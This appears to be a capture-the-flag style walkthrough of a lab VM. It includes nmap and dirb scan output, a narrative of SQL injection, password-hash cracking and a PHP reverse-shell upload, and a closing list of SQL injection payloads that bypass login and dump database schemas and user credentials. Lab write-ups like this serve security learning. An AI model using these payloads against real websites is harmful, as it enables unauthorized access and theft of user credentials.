Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-23 19:15 EDT
Nmap scan report for 192.168.1.109
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
| 256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_ 256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:BA:01:E1 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.83 seconds
Dirb
Let's put the IP to the web browser
Got a login form
Then I click sign up now
After making an account and log in
Exploitation
SQL injection
I tried few tries of SQL injection and successfully got 1 injection using this command
Then I open up Burp and intercept the welcome.php page and send it to repeater.
Then I tried using UNION SELECT and test how many tables are available
The query make a response to us and it has 3 databases
Then I use this query to extract all the database name
We got few here to see what inside.
After extracting every databases, I found out that database that have interesting tables is webapphacking by usinig this query
2 table has been found which is books and users
After that, I extract both tables together using this query
Got a lot of things, let's copy it and put it inside a file
Then we can use sed to replace the comma to newline which the command looks like this
Then we can extract each of the columns name, found out the most interesting one is user and password
Then we got a very long result from the query, copy it to a file and use sed command to separate it properly
John
As we can see it is all md5 hash so we can put it to this website to crack cause john is cracking way too slow!
Then we can log in with the superadmin account
Got a website that leads us to upload a file
Reverse Shell
We can go to this website and grab the php reverse shell file
Then, we need to change the IP and the port inside the file
After that, upload to the server
Then, we go to the /upload directory that we discovered using dirb just now
First, we need to set up a listener at our machine
Our machine
As we can see here we got a file, click the reverseShell file
Privilege Escalation
Go to the /home/legacy directory and we can see a file called touchmenot
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 23 19:18:32 2020
URL_BASE: http://192.168.1.109/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.109/ ----
+ http://192.168.1.109/index.php (CODE:200|SIZE:100)
+ http://192.168.1.109/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.1.109/uploads/
---- Entering directory: http://192.168.1.109/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat May 23 19:18:38 2020
DOWNLOADED: 4612 - FOUND: 2
admin' or '1'='1'#
Anonymous' UNION SELECT 1,2,3#
Anonymous' UNION SELECT GROUP_CONCAT(SCHEMA_NAME),2,3 FROM information_schema.schemata#
Anonymous' UNION SELECT GROUP_CONCAT(TABLE_NAME),2,3 FROM information_schema.tables WHERE table_schema = "webapphacking"#
Anonymous' UNION SELECT GROUP_CONCAT(TABLE_NAME, ':', COLUMN_NAME),2,3 FROM information_schema.columns WHERE table_schema = "webapphacking"#
cat tables | sed 's/,/\n/g'
Anonymous' UNION SELECT GROUP_CONCAT(user, ':',pasword),2,3 FROM webapphacking.users#
